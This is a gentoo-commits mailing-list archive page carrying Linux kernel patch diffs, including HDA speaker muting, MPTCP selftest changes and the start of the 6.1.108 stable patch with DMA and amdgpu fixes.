+ EXPORT_SYMBOL_GPL(snd_hda_gen_stream_pm);
+ 
++/* forcibly mute the speaker output without caching; return true if updated */
++static bool force_mute_output_path(struct hda_codec *codec, hda_nid_t nid)
++{
++	if (!nid)
++		return false;
++	if (!nid_has_mute(codec, nid, HDA_OUTPUT))
++		return false; /* no mute, skip */
++	if (snd_hda_codec_amp_read(codec, nid, 0, HDA_OUTPUT, 0) &
++	    snd_hda_codec_amp_read(codec, nid, 1, HDA_OUTPUT, 0) &
++	    HDA_AMP_MUTE)
++		return false; /* both channels already muted, skip */
++
++	/* direct amp update without caching */
++	snd_hda_codec_write(codec, nid, 0, AC_VERB_SET_AMP_GAIN_MUTE,
++			    AC_AMP_SET_OUTPUT | AC_AMP_SET_LEFT |
++			    AC_AMP_SET_RIGHT | HDA_AMP_MUTE);
++	return true;
++}
++
++/**
++ * snd_hda_gen_shutup_speakers - Forcibly mute the speaker outputs
++ * @codec: the HDA codec
++ *
++ * Forcibly mute the speaker outputs, to be called at suspend or shutdown.
++ *
++ * The mute state done by this function isn't cached, hence the original state
++ * will be restored at resume.
++ *
++ * Return true if the mute state has been changed.
++ */
++bool snd_hda_gen_shutup_speakers(struct hda_codec *codec)
++{
++	struct hda_gen_spec *spec = codec->spec;
++	const int *paths;
++	const struct nid_path *path;
++	int i, p, num_paths;
++	bool updated = false;
++
++	/* if already powered off, do nothing */
++	if (!snd_hdac_is_power_on(&codec->core))
++		return false;
++
++	if (spec->autocfg.line_out_type == AUTO_PIN_SPEAKER_OUT) {
++		paths = spec->out_paths;
++		num_paths = spec->autocfg.line_outs;
++	} else {
++		paths = spec->speaker_paths;
++		num_paths = spec->autocfg.speaker_outs;
++	}
++
++	for (i = 0; i < num_paths; i++) {
++		path = snd_hda_get_path_from_idx(codec, paths[i]);
++		if (!path)
++			continue;
++		for (p = 0; p < path->depth; p++)
++			if (force_mute_output_path(codec, path->path[p]))
++				updated = true;
++	}
++
++	return updated;
++}
++EXPORT_SYMBOL_GPL(snd_hda_gen_shutup_speakers);
++
+ /**
+  * snd_hda_gen_parse_auto_config - Parse the given BIOS configuration and
+  * set up the hda_gen_spec
+diff --git a/sound/pci/hda/hda_generic.h b/sound/pci/hda/hda_generic.h
+index 34eba40cc6e67..fb3ce68e2d717 100644
+--- a/sound/pci/hda/hda_generic.h
++++ b/sound/pci/hda/hda_generic.h
+@@ -352,5 +352,6 @@ int snd_hda_gen_add_mute_led_cdev(struct hda_codec *codec,
+ int snd_hda_gen_add_micmute_led_cdev(struct hda_codec *codec,
+ 				     int (*callback)(struct led_classdev *,
+ 						     enum led_brightness));
++bool snd_hda_gen_shutup_speakers(struct hda_codec *codec);
+ 
+ #endif /* __SOUND_HDA_GENERIC_H */
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index af921364195e4..8396d1d93668c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -205,6 +205,8 @@ static void cx_auto_shutdown(struct hda_codec *codec)
+ {
+ 	struct conexant_spec *spec = codec->spec;
+ 
++	snd_hda_gen_shutup_speakers(codec);
++
+ 	/* Turn the problematic codec into D3 to avoid spurious noises
+ 	   from the internal speaker during (and after) reboot */
+ 	cx_auto_turn_eapd(codec, spec->num_eapds, spec->eapds, false);
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index b4a40a880035c..de655f687dd7d 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -220,6 +220,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21M3"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a73358d753aa7..33c002c26604d 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -402,9 +402,10 @@ reset_with_tcp_filter()
+ 	local ns="${!1}"
+ 	local src="${2}"
+ 	local target="${3}"
++	local chain="${4:-INPUT}"
+ 
+ 	if ! ip netns exec "${ns}" ${iptables} \
+-			-A INPUT \
++			-A "${chain}" \
+ 			-s "${src}" \
+ 			-p tcp \
+ 			-j "${target}"; then
+@@ -956,8 +957,6 @@ do_transfer()
+ 				dp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
+-				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "$addr" \
+-							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+ 			counter=$((counter + 1))
+@@ -1023,7 +1022,6 @@ do_transfer()
+ 				sleep 1
+ 				sp=$(grep "type:10" "$evts_ns2" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
+-				ip netns exec ${connector_ns} ./pm_nl_ctl rem token $tk id $id
+ 				ip netns exec ${connector_ns} ./pm_nl_ctl dsf lip $addr lport $sp \
+ 									rip $da rport $dp token $tk
+ 			fi
+@@ -1251,13 +1249,13 @@ chk_csum_nr()
+ 
+ 	printf "%-${nr_blank}s %s" " " "sum"
+ 	count=$(get_counter ${ns1} "MPTcpExtDataCsumErr")
+-	if [ "$count" != "$csum_ns1" ]; then
++	if [ -n "$count" ] && [ "$count" != "$csum_ns1" ]; then
+ 		extra_msg="$extra_msg ns1=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
+-	   { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
++	     { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns1"
+ 		fail_test
+ 		dump_stats=1
+@@ -1266,13 +1264,13 @@ chk_csum_nr()
+ 	fi
+ 	echo -n " - csum  "
+ 	count=$(get_counter ${ns2} "MPTcpExtDataCsumErr")
+-	if [ "$count" != "$csum_ns2" ]; then
++	if [ -n "$count" ] && [ "$count" != "$csum_ns2" ]; then
+ 		extra_msg="$extra_msg ns2=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
+-	   { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
++	     { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns2"
+ 		fail_test
+ 		dump_stats=1
+@@ -1314,13 +1312,13 @@ chk_fail_nr()
+ 
+ 	printf "%-${nr_blank}s %s" " " "ftx"
+ 	count=$(get_counter ${ns_tx} "MPTcpExtMPFailTx")
+-	if [ "$count" != "$fail_tx" ]; then
++	if [ -n "$count" ] && [ "$count" != "$fail_tx" ]; then
+ 		extra_msg="$extra_msg,tx=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
+-	   { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
++	     { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] TX expected $fail_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1330,13 +1328,13 @@ chk_fail_nr()
+ 
+ 	echo -n " - failrx"
+ 	count=$(get_counter ${ns_rx} "MPTcpExtMPFailRx")
+-	if [ "$count" != "$fail_rx" ]; then
++	if [ -n "$count" ] && [ "$count" != "$fail_rx" ]; then
+ 		extra_msg="$extra_msg,rx=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
+-	   { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
++	     { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] RX expected $fail_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -3023,6 +3021,7 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns1 1 3
+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
++		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 fullmesh_1 slow
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+@@ -3225,7 +3224,7 @@ userspace_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 userspace_1 0 slow
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_rm_nr 1 1 invert
++		chk_rm_nr 1 0 invert
+ 	fi
+ 
+ 	# userspace pm create destroy subflow
+@@ -3235,7 +3234,76 @@ userspace_tests()
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
+ 		chk_join_nr 1 1 1
+-		chk_rm_nr 1 1
++		chk_rm_nr 0 1
++	fi
++
++	# remove and re-add
++	if reset "delete re-add signal" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 3 3
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_mpj $ns2
++		chk_subflow_nr needtitle "before delete" 2
++
++		pm_nl_del_endpoint $ns1 1 10.0.2.1
++		pm_nl_del_endpoint $ns1 2 224.0.0.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete" 1
++
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++
++		pm_nl_del_endpoint $ns1 42 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++		kill_tests_wait
++
++		chk_join_nr 4 4 4
++		chk_add_nr 5 5
++		chk_rm_nr 3 2 invert
++	fi
++
++	# flush and re-add
++	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_attempt_fail $ns2
++		chk_subflow_nr needtitle "before flush" 1
++
++		pm_nl_flush_endpoint $ns2
++		pm_nl_flush_endpoint $ns1
++		wait_rm_addr $ns2 0
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		kill_wait "${tests_pid}"
++		kill_tests_wait
++
++		chk_join_nr 2 2 2
++		chk_add_nr 2 2
++		chk_rm_nr 1 0 invert
+ 	fi
+ }
+ 
+@@ -3264,22 +3332,48 @@ endpoint_tests()
+ 		kill_tests_wait
+ 	fi
+ 
+-	if reset "delete and re-add" &&
++	if reset_with_tcp_filter "delete and re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+ 	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 1 1
+-		pm_nl_set_limits $ns2 1 1
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 0 3
++		pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+ 		sleep 0.5
+-		chk_subflow_nr needtitle "after delete" 1
++		chk_subflow_nr needtitle "after delete id 2" 1
+ 
+-		pm_nl_add_endpoint $ns2 10.0.2.2 dev ns2eth2 flags subflow
++		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+ 		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 2
++		chk_subflow_nr "" "after re-add id 2" 2
++
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_attempt_fail $ns2
++		chk_subflow_nr "" "after new reject" 2
++
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_del_endpoint $ns2 3 10.0.3.2
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		chk_subflow_nr "" "after no reject" 3
++
++		local i
++		for i in $(seq 3); do
++			pm_nl_del_endpoint $ns2 1 10.0.1.2
++			sleep 0.5
++			chk_subflow_nr "" "after delete id 0 ($i)" 2
++
++			pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
++			wait_mpj $ns2
++			chk_subflow_nr "" "after re-add id 0 ($i)" 3
++		done
++
+ 		kill_tests_wait
++
++		chk_join_nr 6 6 6
++		chk_rm_nr 4 4
+ 	fi
+ }
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-04 13:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-04 13:52 UTC (permalink / raw
  To: gentoo-commits

commit:     360f49155a45c1590abbef293d9e13a2a0bf78dd
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep  4 13:52:11 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep  4 13:52:11 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=360f4915

Linux patch 6.1.108

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1107_linux-6.1.108.patch | 2490 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2494 insertions(+)

diff --git a/0000_README b/0000_README
index 31e8b007..06b1b356 100644
--- a/0000_README
+++ b/0000_README
@@ -475,6 +475,10 @@ Patch:  1106_linux-6.1.107.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.107
 
+Patch:  1107_linux-6.1.108.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.108
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1107_linux-6.1.108.patch b/1107_linux-6.1.108.patch
new file mode 100644
index 00000000..13bca249
--- /dev/null
+++ b/1107_linux-6.1.108.patch
@@ -0,0 +1,2490 @@
+diff --git a/Makefile b/Makefile
+index 4c0fc0e5e002f..4813b751ccb0d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 107
++SUBLEVEL = 108
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/include/asm/dma-direct.h b/arch/loongarch/include/asm/dma-direct.h
+deleted file mode 100644
+index 75ccd808a2af3..0000000000000
+--- a/arch/loongarch/include/asm/dma-direct.h
++++ /dev/null
+@@ -1,11 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2020-2022 Loongson Technology Corporation Limited
+- */
+-#ifndef _LOONGARCH_DMA_DIRECT_H
+-#define _LOONGARCH_DMA_DIRECT_H
+-
+-dma_addr_t phys_to_dma(struct device *dev, phys_addr_t paddr);
+-phys_addr_t dma_to_phys(struct device *dev, dma_addr_t daddr);
+-
+-#endif /* _LOONGARCH_DMA_DIRECT_H */
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 5a13630034ef7..826d9a102a51a 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5471,6 +5471,9 @@ static void ata_host_release(struct kref *kref)
+ 	for (i = 0; i < host->n_ports; i++) {
+ 		struct ata_port *ap = host->ports[i];
+ 
++		if (!ap)
++			continue;
++
+ 		kfree(ap->pmp_link);
+ 		kfree(ap->slave_link);
+ 		kfree(ap);
+diff --git a/drivers/dma/dw/core.c b/drivers/dma/dw/core.c
+index 97ba3bfc10b13..66c98676e66ad 100644
+--- a/drivers/dma/dw/core.c
++++ b/drivers/dma/dw/core.c
+@@ -16,6 +16,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/log2.h>
+ #include <linux/mm.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -621,12 +622,10 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 	struct dw_desc		*prev;
+ 	struct dw_desc		*first;
+ 	u32			ctllo, ctlhi;
+-	u8			m_master = dwc->dws.m_master;
+-	u8			lms = DWC_LLP_LMS(m_master);
++	u8			lms = DWC_LLP_LMS(dwc->dws.m_master);
+ 	dma_addr_t		reg;
+ 	unsigned int		reg_width;
+ 	unsigned int		mem_width;
+-	unsigned int		data_width = dw->pdata->data_width[m_master];
+ 	unsigned int		i;
+ 	struct scatterlist	*sg;
+ 	size_t			total_len = 0;
+@@ -660,7 +659,7 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 			mem = sg_dma_address(sg);
+ 			len = sg_dma_len(sg);
+ 
+-			mem_width = __ffs(data_width | mem | len);
++			mem_width = __ffs(sconfig->src_addr_width | mem | len);
+ 
+ slave_sg_todev_fill_desc:
+ 			desc = dwc_desc_get(dwc);
+@@ -720,7 +719,7 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 			lli_write(desc, sar, reg);
+ 			lli_write(desc, dar, mem);
+ 			lli_write(desc, ctlhi, ctlhi);
+-			mem_width = __ffs(data_width | mem);
++			mem_width = __ffs(sconfig->dst_addr_width | mem);
+ 			lli_write(desc, ctllo, ctllo | DWC_CTLL_DST_WIDTH(mem_width));
+ 			desc->len = dlen;
+ 
+@@ -780,17 +779,93 @@ bool dw_dma_filter(struct dma_chan *chan, void *param)
+ }
+ EXPORT_SYMBOL_GPL(dw_dma_filter);
+ 
++static int dwc_verify_p_buswidth(struct dma_chan *chan)
++{
++	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
++	struct dw_dma *dw = to_dw_dma(chan->device);
++	u32 reg_width, max_width;
++
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV)
++		reg_width = dwc->dma_sconfig.dst_addr_width;
++	else if (dwc->dma_sconfig.direction == DMA_DEV_TO_MEM)
++		reg_width = dwc->dma_sconfig.src_addr_width;
++	else /* DMA_MEM_TO_MEM */
++		return 0;
++
++	max_width = dw->pdata->data_width[dwc->dws.p_master];
++
++	/* Fall-back to 1-byte transfer width if undefined */
++	if (reg_width == DMA_SLAVE_BUSWIDTH_UNDEFINED)
++		reg_width = DMA_SLAVE_BUSWIDTH_1_BYTE;
++	else if (!is_power_of_2(reg_width) || reg_width > max_width)
++		return -EINVAL;
++	else /* bus width is valid */
++		return 0;
++
++	/* Update undefined addr width value */
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV)
++		dwc->dma_sconfig.dst_addr_width = reg_width;
++	else /* DMA_DEV_TO_MEM */
++		dwc->dma_sconfig.src_addr_width = reg_width;
++
++	return 0;
++}
++
++static int dwc_verify_m_buswidth(struct dma_chan *chan)
++{
++	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
++	struct dw_dma *dw = to_dw_dma(chan->device);
++	u32 reg_width, reg_burst, mem_width;
++
++	mem_width = dw->pdata->data_width[dwc->dws.m_master];
++
++	/*
++	 * It's possible to have a data portion locked in the DMA FIFO in case
++	 * of the channel suspension. Subsequent channel disabling will cause
++	 * that data silent loss. In order to prevent that maintain the src and
++	 * dst transfer widths coherency by means of the relation:
++	 * (CTLx.SRC_TR_WIDTH * CTLx.SRC_MSIZE >= CTLx.DST_TR_WIDTH)
++	 * Look for the details in the commit message that brings this change.
++	 *
++	 * Note the DMA configs utilized in the calculations below must have
++	 * been verified to have correct values by this method call.
++	 */
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV) {
++		reg_width = dwc->dma_sconfig.dst_addr_width;
++		if (mem_width < reg_width)
++			return -EINVAL;
++
++		dwc->dma_sconfig.src_addr_width = mem_width;
++	} else if (dwc->dma_sconfig.direction == DMA_DEV_TO_MEM) {
++		reg_width = dwc->dma_sconfig.src_addr_width;
++		reg_burst = rounddown_pow_of_two(dwc->dma_sconfig.src_maxburst);
++
++		dwc->dma_sconfig.dst_addr_width = min(mem_width, reg_width * reg_burst);
++	}
++
++	return 0;
++}
++
+ static int dwc_config(struct dma_chan *chan, struct dma_slave_config *sconfig)
+ {
+ 	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
+ 	struct dw_dma *dw = to_dw_dma(chan->device);
++	int ret;
+ 
+ 	memcpy(&dwc->dma_sconfig, sconfig, sizeof(*sconfig));
+ 
+ 	dwc->dma_sconfig.src_maxburst =
+-		clamp(dwc->dma_sconfig.src_maxburst, 0U, dwc->max_burst);
++		clamp(dwc->dma_sconfig.src_maxburst, 1U, dwc->max_burst);
+ 	dwc->dma_sconfig.dst_maxburst =
+-		clamp(dwc->dma_sconfig.dst_maxburst, 0U, dwc->max_burst);
++		clamp(dwc->dma_sconfig.dst_maxburst, 1U, dwc->max_burst);
++
++	ret = dwc_verify_p_buswidth(chan);
++	if (ret)
++		return ret;
++
++	ret = dwc_verify_m_buswidth(chan);
++	if (ret)
++		return ret;
+ 
+ 	dw->encode_maxburst(dwc, &dwc->dma_sconfig.src_maxburst);
+ 	dw->encode_maxburst(dwc, &dwc->dma_sconfig.dst_maxburst);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
+index 02cb3a12dd762..bc030588cd220 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
+@@ -743,7 +743,8 @@ int amdgpu_vce_ring_parse_cs(struct amdgpu_cs_parser *p,
+ 	uint32_t created = 0;
+ 	uint32_t allocated = 0;
+ 	uint32_t tmp, handle = 0;
+-	uint32_t *size = &tmp;
++	uint32_t dummy = 0xffffffff;
++	uint32_t *size = &dummy;
+ 	unsigned idx;
+ 	int i, r = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index cd6e99cf74a06..08b10df93c317 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -28,6 +28,7 @@
+ #include <drm/drm_blend.h>
+ #include <drm/drm_gem_atomic_helper.h>
+ #include <drm/drm_plane_helper.h>
++#include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_fourcc.h>
+ 
+ #include "amdgpu.h"
+@@ -848,10 +849,14 @@ static int dm_plane_helper_prepare_fb(struct drm_plane *plane,
+ 	}
+ 
+ 	afb = to_amdgpu_framebuffer(new_state->fb);
+-	obj = new_state->fb->obj[0];
++	obj = drm_gem_fb_get_obj(new_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return -EINVAL;
++	}
++
+ 	rbo = gem_to_amdgpu_bo(obj);
+ 	adev = amdgpu_ttm_adev(rbo->tbo.bdev);
+-
+ 	r = amdgpu_bo_reserve(rbo, true);
+ 	if (r) {
+ 		dev_err(adev->dev, "fail to reserve bo (%d)\n", r);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 91f0646eb3ee0..5d193872fd1ad 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1829,8 +1829,9 @@ static int smu_bump_power_profile_mode(struct smu_context *smu,
+ }
+ 
+ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+-				   enum amd_dpm_forced_level level,
+-				   bool skip_display_settings)
++					  enum amd_dpm_forced_level level,
++					  bool skip_display_settings,
++					  bool force_update)
+ {
+ 	int ret = 0;
+ 	int index = 0;
+@@ -1859,7 +1860,7 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != level) {
++	if (force_update || smu_dpm_ctx->dpm_level != level) {
+ 		ret = smu_asic_set_performance_level(smu, level);
+ 		if (ret) {
+ 			dev_err(smu->adev->dev, "Failed to set performance level!");
+@@ -1870,13 +1871,12 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level = level;
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+-		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+ 		workload[0] = smu->workload_setting[index];
+ 
+-		if (smu->power_profile_mode != workload[0])
++		if (force_update || smu->power_profile_mode != workload[0])
+ 			smu_bump_power_profile_mode(smu, workload, 0);
+ 	}
+ 
+@@ -1897,11 +1897,13 @@ static int smu_handle_task(struct smu_context *smu,
+ 		ret = smu_pre_display_config_changed(smu);
+ 		if (ret)
+ 			return ret;
+-		ret = smu_adjust_power_state_dynamic(smu, level, false);
++		ret = smu_adjust_power_state_dynamic(smu, level, false, false);
+ 		break;
+ 	case AMD_PP_TASK_COMPLETE_INIT:
++		ret = smu_adjust_power_state_dynamic(smu, level, true, true);
++		break;
+ 	case AMD_PP_TASK_READJUST_POWER_STATE:
+-		ret = smu_adjust_power_state_dynamic(smu, level, true);
++		ret = smu_adjust_power_state_dynamic(smu, level, true, false);
+ 		break;
+ 	default:
+ 		break;
+@@ -1948,8 +1950,7 @@ static int smu_switch_power_profile(void *handle,
+ 		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+-		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+ 		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+diff --git a/drivers/iommu/io-pgtable-arm-v7s.c b/drivers/iommu/io-pgtable-arm-v7s.c
+index ba3115fd0f86a..08ec39111e608 100644
+--- a/drivers/iommu/io-pgtable-arm-v7s.c
++++ b/drivers/iommu/io-pgtable-arm-v7s.c
+@@ -552,9 +552,8 @@ static int arm_v7s_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 		    paddr >= (1ULL << data->iop.cfg.oas)))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	while (pgcount--) {
+ 		ret = __arm_v7s_map(data, iova, paddr, pgsize, prot, 1, data->pgd,
+diff --git a/drivers/iommu/io-pgtable-arm.c b/drivers/iommu/io-pgtable-arm.c
